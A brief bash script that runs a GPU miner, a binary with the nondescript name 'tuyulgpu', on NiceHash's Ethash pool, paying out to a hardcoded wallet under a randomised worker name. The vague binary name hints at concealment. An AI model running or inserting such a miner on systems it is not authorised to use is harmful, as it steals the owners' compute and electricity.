#!/bin/bash

POOL=stratum+tcp://daggerhashimoto.eu.nicehash.com:3353

WALLET=1JsxtEhZYw6oE2nyLDxE9MYRf8KTWFs2LM

WORKER=$(echo $(shuf -i 1000-9999 -n 1)-flash)

chmod +x tuyulgpu

./tuyulgpu --algo ETHASH --pool $POOL --user $WALLET.$WORKER --ethstratum ETHPROXY
